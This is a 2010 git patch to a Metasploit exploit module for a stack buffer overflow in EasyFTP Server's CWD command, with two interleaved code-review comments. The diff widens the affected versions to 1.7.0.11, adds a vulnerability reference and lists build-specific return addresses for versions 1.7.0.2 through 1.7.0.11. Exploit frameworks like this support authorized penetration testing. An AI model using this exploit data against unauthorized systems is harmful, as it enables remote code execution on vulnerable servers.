From cb13ab93cc2f66546417c033027880d9a4ee108f Mon Sep 17 00:00:00 2001 From: Joshua Drake Date: Mon, 26 Apr 2010 21:23:40 +0000 Subject: [PATCH] add additional targets and version notes git-svn-id: file:///home/svn/framework3/trunk@9147 4d416f70-5f16-0410-b530-b9f4589650da --- .../windows/ftp/easyftp_cwd_fixret.rb | 22 ++++++++++++++----- 1 file changed, 16 insertions(+), 6 deletions(-) diff --git a/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb b/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb index 06d6afc5d7..77b18b519a 100644 --- a/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb @@ -18,14 +18,14 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'EasyFTP Server <= 1.7.0.2 CWD Command Stack Buffer Overflow', + 'Name' => 'EasyFTP Server <= 1.7.0.11 CWD Command Stack Buffer Overflow', 'Description' => %q{ - This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.2. - EasyFTP fails to check input size when parsing 'CWD' commands, which allows for - easy stack based buffer overflow exploitation. EasyFTP allows anonymous access by + This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11 + and earlier. EasyFTP fails to check input size when parsing 'CWD' commands, which + leads to a stack based buffer overflow. EasyFTP allows anonymous access by default; valid credentials are typically unnecessary to exploit this vulnerability. - Later versions may vulnerable, but have not been tested. + After version 1.7.0.12, this package was renamed "UplusFtp". This exploit utilizes a small piece of code that I\'ve referred to as 'fixRet'. This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by 
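Review bot: The added description line `After version 1.7.0.12, this package was renamed "UplusFtp".` replaces the removed caveat about later versions, so the text no longer says whether 1.7.0.12 or the renamed UplusFtp releases are affected, fixed, or simply untested. It is also ambiguous against the new title bound of 1.7.0.11, since it is unclear whether the rename happened at 1.7.0.12 or after it. Anyone using this metadata to scope exposure needs that stated; if those builds were not tested, keep the caveat, e.g. `Version 1.7.0.12 and the renamed "UplusFtp" releases have not been tested.` The description string continues past the end of the hunk.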
@@ -40,6 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'Version' => '$Revision$',
 'References' =>
 [
+ [ 'OSVDB', '62134' ],
 [ 'URL', 'http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/' ],
 [ 'URL', 'http://paulmakowski.wordpress.com/2010/04/19/metasploit-plugin-for-easyftp-server-exploit' ],
 [ 'URL', 'http://seclists.org/bugtraq/2010/Feb/202' ],
@@ -58,7 +59,16 @@ class Metasploit3 < Msf::Exploit::Remote
 'Platform' => 'win',
 'Targets' =>
 [
- [ 'Windows Universal', { 'Ret' => 0x00404121 } ], # call edi - from ftpbasicsvr.exe
+ [ 'Windows Universal - v1.7.0.2', { 'Ret' => 0x00404121 } ], # call edi - from ftpbasicsvr.exe
+ [ 'Windows Universal - v1.7.0.3', { 'Ret' => 0x00404121 } ], # call edi - from ftpbasicsvr.exe
+ [ 'Windows Universal - v1.7.0.4', { 'Ret' => 0x00404111 } ], # call edi - from ftpbasicsvr.exe
+ [ 'Windows Universal - v1.7.0.5', { 'Ret' => 0x004040ea } ], # call edi - from ftpbasicsvr.exe
+ [ 'Windows Universal - v1.7.0.6', { 'Ret' => 0x004040ea } ], # call edi - from ftpbasicsvr.exe
+ [ 'Windows Universal - v1.7.0.7', { 'Ret' => 0x004040ea } ], # call edi - from ftpbasicsvr.exe
+ [ 'Windows Universal - v1.7.0.8', { 'Ret' => 0x004043ca } ], # call edi - from ftpbasicsvr.exe
+ [ 'Windows Universal - v1.7.0.9', { 'Ret' => 0x0040438a } ], # call edi - from ftpbasicsvr.exe
+ [ 'Windows Universal - v1.7.0.10', { 'Ret' => 0x0040435a } ], # call edi - from ftpbasicsvr.exe
+ [ 'Windows Universal - v1.7.0.11', { 'Ret' => 0x0040435a } ], # call edi - from ftpbasicsvr.exe
 ],
 'DisclosureDate' => 'Feb 16 2010',
 'DefaultTarget' => 0))
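Review bot: In the 'Targets' hunk (`@@ -58,7 +59,16 @@`), `'DefaultTarget' => 0` stays unchanged in the trailing context, so the default is now specifically the v1.7.0.2 entry even though the module title covers everything up to 1.7.0.11. Each `Ret` is a hard-coded, build-specific address in ftpbasicsvr.exe, so a target that does not match the installed build will most likely crash the FTP service instead of failing cleanly, which is an availability risk during an authorized assessment. I would state that above the list, e.g. `# Ret is build-specific; a target that does not match the installed version will likely crash the service`. The identical trailing comment on all ten entries could also be written once above the array. The `initialize` call that holds this array starts and ends outside the hunk.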